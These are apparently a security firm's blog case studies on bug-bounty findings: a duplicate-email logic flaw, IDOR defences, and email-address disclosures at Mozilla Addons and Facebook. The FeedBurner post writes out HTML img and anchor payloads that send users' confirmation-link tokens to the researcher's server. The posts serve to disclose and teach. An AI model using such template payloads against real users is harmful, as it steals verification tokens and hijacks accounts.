Doppelgangers Week

Hey-O! How’s it going?

Today’s case-study is about a subject we’ve never discussed before (or maybe a little bit) – proper & secure Database management.

So Databases, we all use them. SQL-based or not,  we need some sort of non-volatile mechanism to save our data.
Whether you like it or not, currently, the SQL-based databases (MySQL, MS-SQL etc.) are still the most used databases in the world, and a lot of companies use them as their main storage mechanism. Long live the Structured Query Language! (no;-)

So- properly managing & controlling the database. I know, you’re thinking: “What the hell does this guy want? Its so obvious to manage and control my DB!”. Shut up and read!
First, let’s talk business: I have seen “more than a few” companies that don’t know how to control their own database(s):
a. The database connection string is known to a lot of other mechanism.
b. There is only one user – the root one – and every mechanism use it.
c. Even if there are a few users – one for each mechanism – all of the users have basically the same permissions set.
d. There are no DB backups. EVER!
e. And more horrifying things that I won’t say, because there might be children reading these lines, and it’s bed time.

The database is one of the most holy mechanisms in the application. It doesn’t matter the type of data it stores – it should be well treated.

A well-treated DB (Database)
First, let’s set things straight – “well-treated DB” does not mean a “suffering from obesity DB”. This case-study will not discuss the type of DB collection that your application should use, rules to not flood your DB and the advantages and disadvantages of using an SQL-based DB.
This article will highlight the risks of improperly handling your DB by showing you a real life example, and will supply some fundamental guidelines to keep your application more safe.

A very known Real Estate company, which it’s name we cannot disclose (and we respect their decision) suffered from some of the horrifying cases I described above: Their connection string was known to a lot of mechanisms, they had only one, fully-privileged root user and they didn’t have automatically periodically backups.

They had a main production DB which had a few tables. The main table was ‘user’ – a table which, among other stuff, held user Id, username (which was an email address) and salted password.

The email address was the users main identifier, and it could have been changed/replaced by the user. The change took place immediately, and until the user entered a confirmation link in the new email address he supplied, he wasn’t able to execute any “massive” action on the application, accept for information fetches. Which means – the user was still able to see his own object and data on the application.

So far so good- although the lack of awareness to the mentioned horrors (same CS, root user, no backups) – no SQL injection was possible, no CSRF was found, and the code was pretty much secured. Accept for one thing – It was not possible to supply an already existing email address when signing up, but it was possible to change email address to an existing one.

“So what?”, “What is the impact”, you say
Well, first I also thought: Meh, not much. But I was wrong. Very wrong.
When the DB had 2 rows with the same email address in the main table- it went crazy. Actions and data which was relevant to one email was relevant and visible to the other!

For example, the query to view all private assets which are related to that email looked very simple, like:

SELECT * FROM Assests WHERE EmailAddress = ‘<EMAIL_ADDRESS>’;

And resulted with private assets related to that TWO emails. An attacker could have changed his email to a victim’s one and then leak highly valued, private data.

When the company & us examined the code, we understood that another mechanism was responsible for changing the email address – and there were no existing checks at all. A simple mistake which could have led to a major disaster

So… give me your f-ing guidelines already!
This issue could have been easily prevented. The company agreed that this is a simple logic flaw. Maybe the programmer was tired. And the code reviewer(s). And the QA. I don’t know…
0. So the first guideline is to always drink coffee while writing such sensitive features. Or coke. Definitely not beer. Don’t ask.
1. The second one is to always have one and only DB managing mechanism. Write a simple, public & shared DB wrapping mechanism that every other mechanism in your application will have access to. Don’t have a DB util to each feature, and certainly don’t allow non-related mechanisms to supply you the SQL query.
2. Don’t be naive. Check each given user data for malicious characters. Integrate your existing sanitation engine to your DB managing mechanism.
3. If you can – never delete something from the DB. Remember: restoring is harder than resetting. It is best to simply have an indication that a row is ‘inactive’ instead of deleting it from your DB. Don’t be cheap on space.
4. This one is pretty obvious: Don’t allow non-certified users to execute requests that influence the DB.
5. Have a periodically, 3rd party service that backs up your DB every x hours. Provide this service a different user with only SELECT privileges.

Those 5 “gold” guidelines (and #5 is the most important, to my opinion) will assure you won’t have a heart attack when things will go wrong.
We’ll talk about having a Defibrillator later.

Unboxing

Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry Primal, was that we have been very busy exploring new grounds in the web & application research. Today we would like to present one of those new areas.

Our research in the past couple of months did not focused on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new & exciting. You can call us Columbus. But please don’t.

So, “out-of-the-box” vulnerabilities. What are they? Well, in my definition, those are vulnerabilities that don’t have a known definition.
Today’s case-study is exactly one of those exciting new findings. This time, the research was not a company-specific. It was a method-specific.

Method-specific research?
Its simple. I wasn’t looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are being done in the top-used communication methods.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol, and the way it is being used around the web.

In short, the SMTP protocol is being widely used by millions of web applications to send email messages to the clients. This protocol is very convenient and easy to use, and many companies have implemented it in their everyday use: swap messages between employees, communicate with customers (notifications, etc.) and many more. But the most common use right now for SMTP (or simply for ‘sending mail’) is to verify users accounts.

One of SMTP features is that it allows sending stylish, pretty HTML messages. Remember that.

When users register to a certain web application, they immediately get an email which requires them to approve or to verify themselves, as a proof that this email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. This email contains a link with an access token that validates that the email is indeed being used by the client. This email’s content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: ‘$(confirmlink)

“SMTP allows sending HTML, so lets send XSSs to users and party hard” – Not really. Although HTML is being supported by SMTP, including malicious JavaScript tags, the web application’s XSS audit/sanitizer is responsible for curing the HTML arrived in the SMTP, before parsing it and executing it to the viewer.

And that’s where I started to think: How can I hijack the verification link that users receive to their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I can include a sanitized, non-malicious HTML code, but I couldn’t execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)”>Click here!!!</a>

And it worked. The users received an email with a non-malicious HTML code. When they clicked it, the confirmation link was being logged in a server of mine.

I though: “Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event? Well, the answer is incredible. I’ll use the one allowed tag that is being loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)” />

I was able to send the confirmation link to my server, without any user interaction. I abused HTML’s automatic image loading mechanism, and abused the fact the sanitized HTML could be sent over SMTP.

Google hasn’t accepted this submission. They said, and they are totally right, that the SMTP mail is being sent by FeedBurner with a content type: text/plain header, and therefore, it is the email provider’s fault that it is ignores this flag and still parses the HTML, although it is being told not to.

But still, this case-study was presented to you in order to see how everyday, “innocent & totally safe” features can be used to cause great harm.

Once Upon A Bit

Today’s case-study is pretty short – you are going to get its intention in a matter of seconds.
We are going to talk about observation, and about the slight difference between a no-bug to a major security issue.

Every security research requires respectful amounts of attention and distinction. That’s why there are no successful industrial automatic security testers (excluding XSS testers) – because machines cannot determine all kinds of security risks. As a matter of fact, machines cannot feel danger or detect it. There is no one way for a security research to be conducted against a certain targets. The research parameters are different and varies from the target. Some researches end after a few years, some researches end after a few days and some researches end after a few minutes. This case-study is of the last type. The described bug was so powerful and efficient (to the attacker), that no further research was needed in order to get to the goal.

A very famous company, which, among all the outstanding things it does, provides security consulting to a few dozens of industrial companies and  start-ups, asked us to test its’ “database” resistance. Our goal was to leak the names of the clients from a certain type of collection – not SQL-driven one (we still haven’t got the company’s approval to publish it’s name or the type of vulnerable data collection).

So, after a few minutes of examining the queries which provide information from the data collection, I understood that the name of the data row is a must in order to do a certain action about it. If the query-issuer (=the user who asks the information about the row) has permissions to see the results of the query – a 200 OK response is being returned. If he doesn’t – again – a 200 OK response is being returned.

At first I thought that this is a correct behavior. Whether the information exists in the data collection or not – the same response is being returned.
BUT THEN, Completely by mistake, I opened the response to the non existent data row in the notepad.

The end of the 200 OK response contained an unfamiliar, UTF-8 char – one that shouldn’t be there. The length of the response from the non existent data row request was longer in 1 bit!

At first, I was confused. Why does the response to a non-existent resource contains a weird character at the end of it?
I was sure that there is a JS code which checks the response, and concludes according to that weird char – but there wasn’t.

This was one of the cases where I cannot fully explain the cause of the vulnerability, because of a simple reason – I don’t see the code behind.

The company’s response, besides total shock to the our fast response, was that “apparently, when a non-existent resource is being requested from the server, a certain sub-process which searches for this resource in the data collection fires-up and encounters a memory leak. The result of the process, by rule, should be an empty string, but when the memory leak happens, the result is a strange character. The same one which is being added to the end of the response.

Conclusion
Making your code run a sub-process, a thread or, god forbid, an external 3rd-party process is a very bad practice.
I know that sometimes this is more convenient and it can save a lot of time, but whenever you are using another process – you cannot fully predict its results. Remember – it can crush, freeze, force-closed by the OS or by some other process (anti-virus?).
If you must use a thread or sub-process, at least do it responsibly – make sure the OS memory isn’t full, the arguments that you pass to the process, the process’s permission to run and its possible result scenarios. Don’t ever allow the process to run or execute critical commands basing on user input information.

Knocking the IDOR

Sorry for the no-new-posts-November, FogMarks has been very busy experiencing new fields and worlds. But now — we’re back on baby!

Today’s case-study is about an old incident (and by “old” I mean 3 months old), but due to recent developments in an active research of a very known company’s popular product, I want to present and explain the huge importance of having an Anti-IDOR mechanism in your application.

Intro

Basically, an IDOR (Insecure Direct Object Reference) allows an attacker to mess around with an object that does not belong to him. This could be the private credentials of users (like an email address), private object that the attacker should not have access to (like a private event), or public information that should simply and rationally not be changed (or viewed) by a 3rd-party.

When an attacker is able to mess around with an object that does not belong to him, the consequences can be devastating. I’m not just talking about critical information disclosure that could lead the business to the ground (like Facebook’s recent discoveries), I am also talking about messing around with objects that could lead the attacker to execute code on the server. Don’t be so shocked — it is very much possible.

From an IDOR to RCE

I’m not going to disclose the name of the company or software that this serious vulnerability was found on. I am not even going to say that this is a huge company with a QA and security response team that could fill an entire mall. Twice.
But, as you might have already guessed, gaining access to a certain object thay you shouldn’t have had access to allows you sometimes to actually run commands on the server.

Although I can’t talk about that specific vulnerability, I am going to reveal my logic of preventing an IDOR from its roots.

Ideally speaking

An IDOR is being prevented using an Anti-IDOR Mechanism (AIM). We at FogMarks have developed one a few years ago, and, knock-on-wood, none of our customers have ever dealt with an IDOR problem. Don’t worry, we’re not going to offer you to buy it. This mechanism was created only for two large customers who shared the same code base. Create your own mechanism with the info down below, jeez!
But seriously, AIM’s main goal is to AIM (got the word game?) the usage of a certain object only to the user who created it, or to a user(s) who have access to it.

This is being done by storing that information in a database, especially for sensitive objects that could be targeted from the web clients.
When an object is being inserted to the DB, the mechanism generates it a unique 32 chars long identifier. This identifier is only being used by the server, and it’s called “SUID” (Server Used ID). In addition, the mechanism issues a 15 chars long integer identifier for the client side that is called, of course, “CUID” (Client Used ID). The CUID integer is being made from part of the 32 chars long SUID and part of the object details (like it’s name) using a special algorithm.

The idea of generating two identifiers to the same object is to not reveal the identifier of the actual sensitive object to the client side, so no direct access could be made in unexpected parts of the application.

Since object attributes tend to change (like their names, for example) the CUID is being replaced every once in a while, and the “heart” of the logic is to carefully match the CUID to SUID.

In the users’ permissions there is also a list of nodes that contains the SUID of objects that the user has access to.

When the user issues a request from the client side — the algorithm tries to generate part of the SUID from the supplied CUID. If it succeeded, it tries to match that part to one of the SUIDs list in the users’ permissions collection. If they match, the requesting user gets a one time limited access to the object. This one time access is being enabled for x minutes and for one static IP, until the next process of matching a CUID to SUID.

All this process, of course, is being managed by only one mechanism — The AIM.
The AIM handles requests in a queue form, so when dealing with multiple parallel requests — the AIM might not be the perfect solution (due to the possibility that the object will be changed by two different users at the same time).

Conclusion

In order to keep your platform safe from IDORs, requests to access sensitive objects should be managed only by one mechanism.

You don’t have to implement the exact logic like I did and compile two different identifiers for the same object, but you should definitely manage requests and permissions to private objects in only one place.

Here are some more examples of IDORs found by FogMarks in some very popular companies (and were patched, of course):

Until next time!

Always use protection

 
In what way do you interact with private information of your users? I mean to information like their full name, email address, living address, phone number or any other kind of information that may be important to them, or information they’d rather keep private.

Today’s case-study talks just about that. Parental advisory: Parental advisory: Explicit content. Just kidding.

We will talk about the way private objects (and I’ll explain my interpretation of the term ‘objects’ later on) should be handled, and then we will see 2 neat examples from vulnerabilities I have found on Facebook (and were fixed, of course).

OK, so you’re mature enough to ask your users to trust you with their email address, home address and phone number. If you are smart, you’ll know that this type of information should be transmitted on the wire via HTTPS, but you’ll remember that sometimes it is also a good practice to encrypt it by yourself.

So your users info is properly transmitted and saved in the database, you assume that your DB is immune to SQL injections or other leakage incidents, and you are thinking of cracking a beer and starting another episode of How I Met Your Mother.
Awesome! But first, I’d like to introduce you to another enemy: The IDOR.

Insecure Direct Object References are your information’s second-worst enemy (after SQLi, of course). Attacker who is able to access other users private objects (such as email address, phone number, etc) could basically expose all of the private data from the server, without “talking” with the DB directly or run arbitrary code on the server.

This is the time to explain my definition to “private objects”. User objects are not just the user’s phone number, email address, name, gender, sexual-orientation or favorite side of the bed. They are also objects that the user creates or own, like the items in the user’s cart, a group that the user is managing or a paint that a user has drew.

The best way to handle private objects is to define them as private and treat them with the appropriate honor.

If you know that only a certain user (or users) should be able to access a certain object, make sure that only those users IDs (or other unique-identifier) are able to access and mess with that object.

How will you do so?

Using a Private Object Manager (POM) of course.
The idea is simple: A one-and-only mechanism that will fetch or change information about private objects only if an accepted identifier has been provided. 
For example: A class that will return the email address of the user ID ‘212’ only if the ID of the user who requested that information is ‘212’).

Sounds obvious, right?
Before posting this case-study I had a little chat with some colleague about the idea of creating a unique mechanism that will handle all the requests to private objects.

He said that this is useless

“Because when a request is being made regarding a certain object, it is the job of the session manager to make sure that the currently active session is messing around with an object it has access to.”

But he was wrong. Very wrong.

Everyone knows Facebook events and groups. Everyone is part of a certain group on Facebook, or got an invitation to a certain event.
Like any other feature of Facebook (and especially after Cambridge Analytica data scandal), groups and events has different privacy levels. They can be public — and then every use will be able to see the event/group name and entire content, private — and then every user will be able to see the event/group name but not their content or secret— and then only users who were invited to join the group or participate an event will be able to see their name and content. Regular Facebook search does not discovers the existence of such groups/events.

Almost every object on Facebook has an ID — usually a long number that represents that object in Facebook’s huge Database, and so do groups and events.

So How can one determine the name or the content of a secret group or event?

I’ve spent a lot of time on the modern Facebook platform trying to fetch information from secret groups and events I cannot actually see, only by their ID.
But I couldn’t find any lead to disclose private information from secret objects. On Facebook’s modern platform. Modern.

And that’s when I started to think

Facebook has many versions to its web platform (and even to its mobile one).
Do they use the same Private Object Manager to access “sensitive” objects like a secret group or event?

No.

Immediately after I’ve started to test the mbasic version of Facebook, I realized that things there work a little different. Ok, a lot different.

I have found 2 vulnerabilities which allowed the name of a secret group or event to be disclosed to any user, regardless the fact that he is not invited or in the group/event. The first vulnerability is here by presented, but the second one is yet to be fully patched (in progress these days):

Always use protection

Seriously, these vulnerabilities would have been prevented if Facebook would have implemented a single Private Object Manager to any of its version.
The idea of hoping that a session manager will prevent an insecure access to an object is ridiculous, simply because some objects are so wildly used (like groups on Facebook with millions of members), that the linkage of a user session to that object is high inefficient (and wrong).

Having a one and only filtering mechanism, a “condom”, to access the most important objects or details, is considered a best practice.

Cheers!

How Private Is Your Private Email Address?


After reading some blog posts about Mozilla’s Addons websites, I was fascinated from this python-based platform and decided to focus on it.
The XSS vector led basically to nowhere. The folks at Mozilla did excellent job curing and properly sanitizing every user input.

This led me to change my direction and search for the most fun vulnerabilities – logic flaws.

The logic
Most people don’t know, but the fastest way to track logic-based security issues is to get into the mind of the author and to try and think from his point of view. That’s it. Look at a JS function — would you write the same code? What would you have changed? Why?

Mozilla’s Addons site has a collections feature, where users can create a custom collection of their favorite addons. That’s pretty cool, since users can invite other users to a role on their collection. How, do you ask? By email address of course!

A user types in the email address of another user, an AJAX request is being made to an ‘address resolver’ and the ID of the user who owns this email address returns.

When the user press ‘Save Changes’, the just-arrived ID is being passed to the server and the being translated again to the email address, next to the user’s username. Pretty weird.

So, If the logic, for some reason, is to translate an email to an ID and then the ID to the email, we can simply interrupt this process in the middle of it, and replace the generated ID with the ID of another user.

The following video presents a proof of concept of this vulnerability, that exposed the email address of any of addons.mozilla.org users.

Final Thoughts
It is a bad practice to do the same operation twice. If you need something to be fetched from the server, fetch it one time and store it locally (HTML5 localStorage, cookie, etc.). This simple logic flaw jeopardized hundreds of thousands of users until it was patched by Mozilla.

The patch, as you guessed, was to send the email address to the server, instead of sending the ID.

Facebook Invitees Email Address Disclosure

Prologue

When Facebook was just a tiny company with only a few members, it needed a way to get more members.

Today, when you want more visitors to your site, you advertise on Facebook, because everybody is there.

Back then, the main advertising options were manually post advertisements on popular websites (using Google, for instance), or getting your members invite their friends using their email account.

Facebook’s Past Invitation System

When a user joined Facebook at its early days, there was literally nothing to see. Therefore, Facebook asked their members to invite their friends using an email invitation that was created by the registered user.

The user supplied his friends email addresses, and they received an email from Facebook saying that ‘Mister X is now on Facebook, you should join too!’.

Fun Part

As I came across this feature of Facebook I immediately started to analyze it.

I thought it would be nice to try and fool people that a user Y invited them to join, although the one who did it was the user X.

As I kept inviting people over and over again I have noticed something interesting: each invitation to a specific email address contained an invitation ID: ent_cp_id.

When clicking on Invite to Facebook a small windows pops up and shows the full email address of the invitee.

I wrote down the ent_cp_id of some email I would like to invite, and invited him once.

At this point I thought: “OK, I have invited this user, the ent_cp_id of him should not be accessible anymore”. But I was wrong. The ent_cp_id of it was still there. In fact, by simply re transmitting the HTTP request I could invite the same user again.

But the most interesting part of this vulnerability is the fact that any user could have seen the email address that was behind an ent_cp_id.

That means that anyone who was ever invited to Facebook via email was vulnerable to email address disclosure, because that invitation was never deleted and it was accessible to any user. All an attacker had to do next was to randomly guess ent_cp_ids. As I said, old ent_cp_ids aren’t deleted, so the success rate is very high.

Conclusion

When you are dealing with sensitive information like email address you should always limit the number of times that an action could be done. In addition, it is recommended to wipe any id that might be linked to that sensitive information, or at least hash-protect it.

Facebook quickly solved this issue and awarded a kind bounty.